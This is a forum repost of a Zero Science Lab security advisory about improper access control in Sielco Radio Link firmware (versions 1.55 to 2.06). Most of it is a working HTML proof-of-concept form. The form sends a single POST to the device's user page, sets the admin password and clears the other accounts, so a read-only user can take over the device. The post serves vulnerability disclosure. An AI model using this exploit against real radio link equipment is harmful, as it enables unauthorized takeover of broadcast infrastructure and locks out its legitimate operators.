Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!
  • Важно
    Имате проблем со најава или регистрација на it.mk?
    Побарајте го решението на вашиот проблем ТУКА!

Sielco Radio Link 2.06 Improper Access Control Change Admin Password

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
908
559
www.zeroscience.mk
HTML:
<!--


Sielco Radio Link 2.06 Improper Access Control Change Admin Password


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
                  2.05 (RTX19)
                  2.00 (EXC19)
                  1.60 (RTX19)
                  1.59 (RTX19)
                  1.55 (EXC19)

Summary: Sielco develops and produces radio links for all transmission
and reception needs, thanks to innovative units and excellent performances,
accompanied by a high reliability and low consumption.

Desc: The application suffers from improper access control when editing
users. A user with Read permissions can manipulate users, passwords and
permissions by sending a single HTTP POST request with modified parameters
and edit other users' names, passwords and permissions including admin
password.

Tested on: lwIP/2.1.1
           Web/2.9.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5760
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5760.php


26.01.2023

-->


<html>
  <body>
    <form action="http://radiolink/protect/users_rx.htm" method="POST">
      <input type="hidden" name="pwd0" value="Ch4nged12" />      <!-- This will set/modify admin pwd -->
      <input type="hidden" name="pwd0bis" value="Ch4nged12" />   <!-- This will set/modify admin pwd -->
      <input type="hidden" name="user1" value="" />              <!-- This will set/modify user1 -->
      <input type="hidden" name="pwd1" value="" />               <!-- This will set/modify user1 pwd -->
      <input type="hidden" name="pwd1bis" value="" />            <!-- This will set/modify user1 pwd -->
      <input type="hidden" name="auth1" value="0" />             <!-- This will set user1 read perm -->
      <input type="hidden" name="user2" value="" />              <!-- This will set/modify user2 -->
      <input type="hidden" name="pwd2" value="" />               <!-- This will set/modify user2 pwd -->
      <input type="hidden" name="pwd2bis" value="" />            <!-- This will set/modify user2 pwd -->
      <input type="hidden" name="auth2" value="0" />             <!-- This will set user2 read perm -->
      <input type="hidden" name="user3" value="" />              <!-- This will set/modify user3 -->
      <input type="hidden" name="pwd3" value="" />               <!-- This will set/modify user3 pwd -->
      <input type="hidden" name="pwd3bis" value="" />            <!-- This will set/modify user3 pwd -->
      <input type="hidden" name="auth3" value="0" />             <!-- This will set user3 read perm -->
      <input type="submit" value="Modify admin pwd, delete all users" />
    </form>
  </body>
</html>


 

Нови мислења

Последни Теми

Статистика

Теми
46.529
Мислења
964.361
Членови
34.902
Огласи
2.617
Најнов член
darko SNR
На врв Дно